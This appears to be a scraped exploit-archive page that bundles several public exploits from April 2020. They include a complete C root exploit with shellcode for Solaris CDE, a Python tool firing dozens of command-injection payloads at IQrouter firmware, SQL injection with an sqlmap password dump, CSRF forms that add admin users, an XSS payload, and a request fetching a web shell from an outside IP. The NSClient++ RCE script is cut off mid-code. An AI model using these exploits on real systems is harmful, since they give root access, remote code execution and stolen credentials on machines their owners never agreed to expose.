HireHackking

# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation # Date: 2020-04-21 # Author: Marco Ivaldi # Vendor: www.oracle.com # CVE: CVE-2020-2944 /* * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel * Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info> * * A buffer overflow in the _SanityCheck() function in the Common Desktop * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and * earlier allows local users to gain root privileges via a long calendar name * or calendar owner passed to sdtcm_convert in a malicious calendar file * (CVE-2020-2944). * * The open source version of CDE (based on the CDE 2.x codebase) is not * affected, because it does not ship the vulnerable binary. * * "CDE, the gift that keeps on giving" -- @0xdea * "Feels more like a curse you can't break from this side." -- @alanc * * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory * space, try returning to sprintf() instead of strcpy(). * * I haven't written a Solaris/SPARC version because I don't have a SPARC box * on which Solaris 10 can run. If anybody is kind enough to give me access to * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. * * Usage: * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall * $ ./raptor_sdtcm_conv * [...] * Do you want to correct it? (Y/N) [Y] n * # id * uid=0(root) gid=1(other) egid=12(daemon) * # * * This should work with any common configuration on the first try. To * re-enable rpc.cmsd, clear its service maintenance status by running the * following commands as root: * # /usr/sbin/svcadm clear cde-calendar-manager * # /usr/bin/svcs -a | grep calendar * online 13:16:54 svc:/network/rpc/cde-calendar-manager:default * * Tested on: * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) * [previous Solaris versions are also likely vulnerable] */ #include <fcntl.h> #include <link.h> #include <procfs.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/stat.h> #include <sys/systeminfo.h> #include <sys/types.h> #define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel" #define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>" #define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program #define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility #define BUFSIZE 2304 // size of the name/owner #define PAYSIZE 1024 // size of the payload #define OFFSET env_len / 2 // offset to the shellcode char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ /* double setuid() */ "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" /* execve() */ "\x31\xc0\x50\x68/ksh\x68/bin" "\x89\xe3\x50\x53\x89\xe2\x50" "\x52\x53\xb0\x3b\x50\xcd\x91"; /* globals */ char *env[256]; int env_pos = 0, env_len = 0; /* prototypes */ int add_env(char *string); void check_zero(int addr, char *pattern); int search_ldso(char *sym); int search_rwx_mem(void); void set_val(char *buf, int pos, int val); /* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], payload[PAYSIZE]; char platform[256], release[256], hostname[256]; int i, payaddr; char *arg[3] = {"foo", "hax0r", NULL}; int sb = ((int)argv[0] | 0xfff); /* stack base */ int ret = search_ldso("strcpy"); /* or sprintf */ int rwx_mem = search_rwx_mem(); /* rwx memory */ char cmd[1024]; FILE *fp; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* read command line */ if (argc != 1) { fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]); fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n"); exit(1); } /* get system information */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1); /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ memset(payload, '\x90', PAYSIZE); payload[PAYSIZE - 1] = 0x0; memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc)); /* fill the envp, keeping padding */ add_env(payload); add_env("HOME=/tmp"); add_env(NULL); /* calculate the payload address */ payaddr = sb - OFFSET; /* prepare the evil palette name */ memset(buf, 'A', sizeof(buf)); buf[sizeof(buf) - 1] = 0x0; /* fill with function address in ld.so.1, saved eip, and arguments */ for (i = 0; i < BUFSIZE - 16; i += 4) { set_val(buf, i, ret); /* strcpy */ set_val(buf, i += 4, rwx_mem); /* saved eip */ set_val(buf, i += 4, rwx_mem); /* 1st argument */ set_val(buf, i += 4, payaddr); /* 2nd argument */ } /* print some output */ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); /* create the evil calendar file */ fprintf(stderr, "Preparing the evil calendar file... "); snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname); if (system(cmd) == -1) { perror("Error creating calendar file"); exit(1); } if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) { perror("Error creating calendar file"); exit(1); } /* prepare the evil calendar file (badchars currently not handled) */ fp = fopen("/usr/spool/calendar/callog.hax0r", "w"); if (!fp) { perror("Error preparing calendar file"); exit(1); } fprintf(fp, "Version: 4\n(calendarattributes " "(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\"," "\"10:access_list\",\"world:2\")\n"); /* buffer overflow in calendar name */ fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," "\"5:string\",\"%s\")\n", buf); fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," "\"6:user\",\"fnord\")\n)"); /* buffer overflow in calendar owner */ /* fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," "\"5:string\",\"hax0r\")\n"); fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," "\"6:user\",\"%s\")\n)", buf); */ fclose(fp); fprintf(stderr, "Done.\n"); /* run the vulnerable program */ fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n"); execve(VULN, arg, env); perror("execve"); exit(0); } /* * add_env(): add a variable to envp and pad if needed */ int add_env(char *string) { int i; /* null termination */ if (!string) { env[env_pos] = NULL; return env_len; } /* add the variable to envp */ env[env_pos] = string; env_len += strlen(string) + 1; env_pos++; /* pad the envp using zeroes */ if ((strlen(string) + 1) % 4) for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { env[env_pos] = string + strlen(string); env_len++; } return env_len; } /* * check_zero(): check an address for the presence of a 0x00 */ void check_zero(int addr, char *pattern) { if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || !(addr & 0xff000000)) { fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); exit(1); } } /* * search_ldso(): search for a symbol inside ld.so.1 */ int search_ldso(char *sym) { int addr; void *handle; Link_map *lm; /* open the executable object file */ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { perror("dlopen"); exit(1); } /* get dynamic load information */ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { perror("dlinfo"); exit(1); } /* search for the address of the symbol */ if ((addr = (int)dlsym(handle, sym)) == NULL) { fprintf(stderr, "Sorry, function %s() not found\n", sym); exit(1); } /* close the executable object file */ dlclose(handle); check_zero(addr - 4, sym); return addr; } /* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */ int search_rwx_mem(void) { int fd; char tmp[16]; prmap_t map; int addr = 0, addr_old; /* open the proc filesystem */ sprintf(tmp,"/proc/%d/map", (int)getpid()); if ((fd = open(tmp, O_RDONLY)) < 0) { fprintf(stderr, "Can't open %s\n", tmp); exit(1); } /* search for the last RWX memory segment before stack (last - 1) */ while (read(fd, &map, sizeof(map))) if (map.pr_vaddr) if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { addr_old = addr; addr = map.pr_vaddr; } close(fd); /* add 4 to the exact address NULL bytes */ if (!(addr_old & 0xff)) addr_old |= 0x04; if (!(addr_old & 0xff00)) addr_old |= 0x0400; return addr_old; } /* * set_val(): copy a dword inside a buffer (little endian) */ void set_val(char *buf, int pos, int val) { buf[pos] = (val & 0x000000ff); buf[pos + 1] = (val & 0x0000ff00) >> 8; buf[pos + 2] = (val & 0x00ff0000) >> 16; buf[pos + 3] = (val & 0xff000000) >> 24; }

# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://sourceforge.net/projects/cszcms/ # Version: v1.2.7 # Description: # Authenticated user can inject hyperlink to Backend System Dashboard and # Member Dashboard via message. PoC Request: POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/CSZCMS-V1.2.7/member/newpm Content-Type: application/x-www-form-urlencoded Content-Length: 196 Cookie: cszcookie Connection: close Upgrade-Insecure-Requests: 1 csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please click to view</a></b></h1>&message=phishing&submit=Send

# Exploit Title: PMB 5.6 - 'logid' SQL Injection # Google Dork: inurl:opac_css # Date: 2020-04-20 # Exploit Author: 41-trk (Tarik Bakir) # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 5.6 -==== Software Description ====- PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs. PMB is based on web technology. This is what we sometimes call a 'web-app'. PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language. The main functions of PMB are : * Supporting the UNIMARC format * Authorities management (authors, publishers, series, subjects...) * Management of loans, holds, borrowers... * A user-friendly configuration * The ability to import full bibliographic records * A user-friendly OPAC integrating a browser * Loans management with a module designed to serve even the very small establishments * Serials management * Simple administration procedures that can be handled easily even by the library staff... -==== Vulnerability ====- Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter. -==== POC ====- http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI] Using SQLMAP : ./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords -==== Exploit requirements ====- - You will need to be logged in in order to exploit the vulnerability.

# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution # Date: 2020-04-21 # Exploit Author: drakylar # Vendor Homepage: https://evenroute.com/ # Software Link: https://evenroute.com/iqrouter # Version: IQrouter firmware up to 3.3.1 # Tested on: IQrouter firmware 3.3.1 # CVE : N/A #!/usr/bin/env python3 import argparse from sys import argv, exit try: import requests except ImportError: print("Install requests lib! pip3 install requests") print(""" ####################################################################### # IQrouter multiple RCE and other vulnerabilities # # by drakylar (Shaposhnikov Ilya) # # CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # # CVE-2020-11967 CVE-2020-11968 # ####################################################################### """) rce_setup = [ [ "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'", "RCE /vlanTag (vlan_tag param)" ], [ "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'", "RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true" ], [ "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2", "RCE /screen9 (s2 param)" ], [ "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2", "RCE /screen9 (s1 param)" ], [ "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'", "RCE /screen9 (p2 param)" ], [ "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2", "RCE /screen9 (p1 param)" ], [ "/cgi-bin/luci/er/screen4?save_isp='`{}`", "RCE /screen4 (save_isp param)" ], [ "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'", "RCE /screen2 set_wan_modem_interfaces param)" ], [ "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'", "RCE /screen2 find_ip_address_conflict param)" ], [ "/cgi-bin/luci/er/screen10?set_security_question='`{}`'", "RCE /screen10 (set_security_question param)" ], [ "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1", "RCE /screen10 (set_security_answer param)"], [ "/cgi-bin/luci/er/screen1?zonename='`{}`'", "RCE /screen1 (zonename param)" ], [ "/cgi-bin/luci/er/register?email=`{}`", "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)" ] ] rce_any = [ [ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1", "RCE /wifi (s2 param)" ], [ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7", "RCE /wifi (s1 param)" ], [ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'", "RCE /wifi (p2 param)" ], [ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4", "RCE /wifi (p1 param)" ], [ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", "RCE /wifi (guestwifi_5g_ssid param)" ], [ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", "RCE /wifi (guestwifi_2g_ssid param)" ], [ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", "RCE /wifi (guest_key param)" ], [ "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7", "RCE /wifi (enable_guestwifi param)" ], [ "/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123", "RCE /screen11.1 (email param)" ], [ "/cgi-bin/luci/er/reboot_link?link='`{}`'", "RCE /reboot_link (link param)" ], [ "/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/", "RCE /diag_wifi (htm5ghz param)" ], [ "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/", "RCE /diag_wifi (htm2ghz param)" ], [ "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/", "RCE /diag_wifi (c5ghz param)" ], [ "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/", "RCE /diag_wifi (c2ghz param)" ], [ "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/", "RCE /diag_set_static_wan (static_ip param)" ], [ "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/", "RCE /diag_set_static_wan (net_mask param)" ], [ "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/", "RCE /diag_set_static_wan (gateway param)" ], [ "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/", "RCE /diag_set_static_wan (dns param)" ], [ "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/", "RCE /diag_set_static_modem (static_ip param)" ], [ "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/", "RCE /diag_set_static_modem (net_mask param)" ], [ "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/", "RCE /diag_set_static_modem (gateway param)" ], [ "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/", "RCE /diag_set_device_name_and_sync (device_name param)" ], [ "/cgi-bin/luci/er/diag_set_device_name/'`{}`'/", "RCE /diag_set_device_name (device_name param)" ], [ "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/", "RCE /diag_pppoe_update (wan_username param)" ], [ "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/", "RCE /diag_pppoe_update (wan_password param)" ], [ "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/", "RCE /diag_pppoe (wan_username param)" ], [ "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/", "RCE /diag_pppoe (wan_password param)" ], [ "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/", "RCE /diag_pppoa_update (wan_username param)" ], [ "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/", "RCE /diag_pppoa_update (wan_password param)" ], [ "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/", "RCE /diag_pppoa (wan_username param)" ], [ "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/", "RCE /diag_pppoa (wan_password param)" ], [ "/cgi-bin/luci/er/advanced_link?link='`{}`'", "RCE /advanced_link (link param)" ] ] advanced_payloads = [ [ "/cgi-bin/luci/er/reboot_link?reboot=1", "Reboot IQrouter (/reboot_link reboot param))" ], [ "/cgi-bin/luci/er/screen2?reboot=1", "Reboot IQrouter (/screen2 reboot param))" ], [ "/cgi-bin/luci/er/index?reset_config=1", "Reset IQrouter (/index reset_config param)" ], [ "/cgi-bin/luci/er/screen7?upgrade=1", "Upgrade IQrouter (/screen7 upgrade param)" ], [ "/cgi-bin/luci/er/vlanTag?restart_network=1", "Restart network (/vlanTag restart_network param)" ], [ "/cgi-bin/luci/er/diag_iperf_cmd/start", "Start iperf script (/diag_iperf_cmd/start)" ], [ "/cgi-bin/luci/er/diag_iperf_cmd/stop", "Stop iperf script (/diag_iperf_cmd/stop)" ], [ "/cgi-bin/luci/er/get_syslog", "Router setup info log (/get_syslog)" ], [ "/cgi-bin/luci/er/diag_set_password/c00lpasswd/", "Change root password to c00lpasswd (can change in code)" ], [ "/cgi-bin/luci/er/reset_password/", "Change root password to 'changeme' (static)" ] ] def print_payloads(): print('#' * 30) print("Payloads list") num = 1 print('######################### RCE without auth ########################') for payload in rce_any: print("{} - {}".format(num, payload[1])) num += 1 print( '############### RCE (router need to be in setup mode) ###############') for payload in rce_setup: print("{} - {}".format(num, payload[1])) num += 1 print( '######################### Advanced payloads #########################') for payload in advanced_payloads: print("{} - {}".format(num, payload[1])) num += 1 parser = argparse.ArgumentParser(description="IQrouter multiple RCE") parser.add_argument('--host', help='Host', type=str) parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) parser.add_argument('-n', '--num', help='Payload number', default=0, type=int) parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', default="pwd", type=str) parser.add_argument('--protocol', help='Protocol (http/https)', default="http", type=str) args = parser.parse_args() def main(): print("") full_payload_list = rce_setup + rce_any + advanced_payloads payloads_amount = len(full_payload_list) try: hostname = args.host port = args.port payload_num = int(args.num) bash_cmd = args.cmd protocol = args.protocol if payload_num < 1 or payload_num > payloads_amount: print("Error with payload number!") raise IndexError if port < 0 or port > 65535: print("Error with port number") raise IndexError if protocol not in ['http', 'https']: print("Error with protocol name") raise IndexError current_payload = full_payload_list[payload_num - 1] print("Payload: {}".format(current_payload[1])) print("Host: {}".format(hostname)) print("Port: {}".format(port)) print("Protocol: {}".format(protocol)) print("Command: {}".format(bash_cmd)) full_url = "{}://{}:{}{}".format(protocol, hostname, port, current_payload[0].format(bash_cmd)) print("Built URL: {}".format(full_url)) r = requests.get(full_url) print("Status code: {}".format(r.status_code)) return except IndexError: parser.print_help() print_payloads() exit(1) if __name__ == '__main__': print( "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.") exit(main())

# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) # Google Dork:jizhicms # Date: 2020-04-18 # Exploit Author: iej1ctk1g # Product web page: https://www.p5.hu # Affected version: 1.0.20, 1.0.11 # CVE : N/A <!-- P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting Vendor: P5 Product web page: https://www.p5.hu Affected version: 1.0.20, 1.0.11 Summary: The FNIP-8x16A is an eight channel relay module used for switching any type of load that doesn’t exceed the specifications. Via its built-in web site and TCP/IP communication, the outputs and inputs can be controlled and monitored from standard network capable devices such as computers, smartphones, web-tablets, etc. either locally or via the network. The module can be used independently or as part of a complex control system in residential and commercial installations. Desc: The controller suffers from CSRF and XSS vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Linux CGI Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5564 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php 29.01.2020 --> <!-- CSRF add admin user --> <html> <body> <form action="http://192.168.1.17:83/user.cgi" method="POST"> <input type="hidden" name="uno" value="1" /> <!-- User number (user1) --> <input type="hidden" name="un" value="testingus" /> <!-- Username --> <input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer --> <input type="hidden" name="enabled" value="1" /> <input type="hidden" name="pw" value="123456" /> <input type="hidden" name="pw2" value="123456" /> <input type="submit" value="Zubmit" /> </form> </body> </html> <!-- CSRF change admin password --> <html> <body> <form action="http://192.168.1.17:83/user.cgi" method="POST"> <input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow --> <input type="hidden" name="pw" value="123456" /> <input type="hidden" name="pw2" value="123456" /> <input type="submit" value="Zubmit" /> </form> </body> </html> <!-- XSS modify labels --> <html> <body> <form action="http://192.168.1.17:83/config.html" method="POST"> <input type="hidden" name="lab1" value="Channel1" /> <input type="hidden" name="lab2" value="Channel2" /> <input type="hidden" name="lab3" value="Channel3" /> <input type="hidden" name="lab4" value='"><script>confirm(251)</script>' /> <input type="hidden" name="lab12" value="etc." /> <input type="submit" value="Zubmit" /> </form> </body> </html>

# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download # Google Dork: jizhicms # Date: 2020-04-18 # Exploit Author: iej1ctk1g # Vendor Homepage: https://www.jizhicms.cn/ # Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip # Version: 1.6.7 # Tested on： Mac OS # CVE : N/A Data 1. POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.253:8888 Content-Length: 86 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.253:8888 Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 Connection: close action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip Data 2. POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.253:8888 Content-Length: 32 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.253:8888 Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 Connection: close action=file-upzip&filepath=shell

# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution # Google Dork: N/A # Date: 2020-04-20 # Exploit Author: kindredsec # Vendor Homepage: https://nsclient.org/ # Software Link: https://nsclient.org/download/ # Version: 0.5.2.35 # Tested on: Microsoft Windows 10 Pro (x64) # CVE: N/A # # NSClient++ is a monitoring agent that has the option to run external scripts. # This feature can allow an attacker, given they have credentials, the ability to execute # arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt # Default, this leads to privileged code execution. #!/usr/bin/env python3 import requests from bs4 import BeautifulSoup as bs import urllib3 import json import sys import random import string import time import argparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def generateName(): letters = string.ascii_lowercase + string.ascii_uppercase return ''.join(random.choice(letters) for i in range(random.randint(8,13))) def printStatus(message, msg_type): C_YELLOW = '\033[1;33m' C_RESET = '\033[0m' C_GREEN = '\033[1;32m' C_RED = '\033[1;31m' if msg_type == "good": green_plus = C_GREEN + "[+]" + C_RESET string = green_plus + " " + message elif msg_type == "info": yellow_ex = C_YELLOW + "[!]" + C_RESET string = yellow_ex + " " + message elif msg_type == "bad": red_minus = C_RED + "[-]" + C_RESET string = red_minus + " " + message print(string) # This function adds a new external script containing the desired # command, then saves the configuration def configurePayload(session, cmd, key): printStatus("Configuring Script with Specified Payload . . .", "info") endpoint = "/settings/query.json" node = { "path" : "/settings/external scripts/scripts", "key" : key } value = { "string_data" : cmd } update = { "node" : node , "value" : value } payload = [ { "plugin_id" : "1234", "update" : update } ] json_data = { "type" : "SettingsRequestMessage", "payload" : payload } out = session.post(url = base_url + endpoint, json=json_data, verify=False) if "STATUS_OK" not in str(out.content): printStatus("Error configuring payload. Hit error at: " + endpoint, "bad") sys.exit(1) printStatus("Added External Script (name: " + key + ")", "good") time.sleep(3) printStatus("Saving Configuration . . .", "info") header = { "version" : "1" } payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ] json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload } session.post(url = base_url + endpoint, json=json_data, verify=False) # Since the application needs to be restarted after making changes, # this function reloads the application, and waits for it to come back. def reloadConfig(session): printStatus("Reloading Application . . .", "info") endpoint = "/core/reload" session.get(url = base_url + endpoint, verify=False) # Wait until the application successfully reloads by making a request # every 10 seconds until it responds. printStatus("Waiting for Application to reload . . .", "info") time.sleep(10) response = False count = 0 while not response: try: out = session.get(url = base_url, verify=False, timeout=10) if len(out.content) > 0: response = True except: count += 1 if count > 10: printStatus("Application failed to reload. Nice DoS exploit! /s", "bad") sys.exit(1) else: continue # This function makes the call to the new external script to # ultimately execute the code. def triggerPayload(session, key): printStatus("Triggering payload, should execute shortly . . .", "info") endpoint = "/query/" + key try: session.get(url = base_url + endpoint, verify=False, timeout=10) except requests.exceptions.ReadTimeout: printStatus("Timeout exceeded. Assuming your payload executed . . .", "info") sys.exit(0) # Before setting up the exploit, this function makes sure the # required feature (External Scripts) is enabled on the application. def enableFeature(session): printStatus("Enabling External Scripts Module . . .", "info") endpoint = "/registry/control/module/load" params = { "name" : "CheckExternalScripts" } out = session.get(url = base_url + endpoint, params=params, verify=False) if "STATUS_OK" not in str(out.content): printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad") sys.exit(1) # This function obtains an authentication token that gets added to all # remaining headers. def getAuthToken(session): printStatus("Obtaining Authentication Token . . .", "info") endpoint = "/auth/token" params = { "password" : password } auth = session.get(url = base_url + endpoint, params=params, verify=False) if "auth token" in str(auth.content): j = json.loads(auth.content) authToken = j["auth token"] printStatus("Got auth token: " + authToken, "good") return authToken else: printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad") sys.exit(1) parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE") parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.') parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.') 